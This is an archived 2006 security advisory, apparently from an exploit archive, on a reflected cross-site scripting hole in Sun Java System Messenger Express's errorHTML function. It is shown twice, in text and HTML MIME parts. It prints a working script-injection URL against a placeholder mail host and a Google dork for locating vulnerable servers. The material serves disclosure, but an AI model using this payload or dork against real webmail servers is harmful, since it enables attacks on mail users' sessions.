SystemMessenger_xss.txt

SystemMessenger_xss.txt: Posted Nov 1, 2006; Authored by Handrix | Site morx.org; Sun java System Messenger Express suffers from a cross site scripting vulnerability in the errorHTML function.; tags | exploit, java, xss; SHA-256 | b0b711d94cc3648353f66bd772fc93bfea085958fe11461dc4e723f0789a346a; Download | Favorite | View

SystemMessenger_xss.txt

------=_Part_1542_5083137.1162268411579
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2006
MorX security research team
www.morx.org

Description:
Sun java System Messenger Express XSS

The index script  is vulnerable to XSS attacks, in functiion errorHTML .

function errorHTML() {
  var s=''
  .
  .
  .

  document.write(s) ---> Need more case filetring the 's' var
}


So, this issue can allow an attacker to bypass content filters and
potentially carry out cross-site scripting, HTML injection and other
attacks.

Exploit:
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E

Founded with Google by this dorks :
intitle:"Sun Java(tm) System Messenger Express"

Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6

------=_Part_1542_5083137.1162268411579
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Sun java System Messenger Express<br>remote XSS vulnerabilities<br>By: Handrix <handrix_at_morx_org><br>29 November 2006<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description:
<br>Sun java System Messenger Express XSS<br><br>The index script&nbsp; is vulnerable to XSS attacks, in functiion errorHTML .<br><br>function errorHTML() {<br>&nbsp; var s=''<br>&nbsp; .<br>&nbsp; .<br>&nbsp; .<br><br>&nbsp; document.write(s) ---> Need more case filetring the 's' var
<br>}<br><br><br>So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.<br><br>Exploit:<br><a href="https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E">
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a><br><br>Founded with Google by this dorks :<br>intitle:"Sun Java(tm) System Messenger Express"<br><br>Vulnerable versions :<br>
Sun java System Messenger Express<br>Sun java System Messenger Express6

------=_Part_1542_5083137.1162268411579--

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

SystemMessenger_xss.txt

SystemMessenger_xss.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SystemMessenger_xss.txt

Share This

SystemMessenger_xss.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems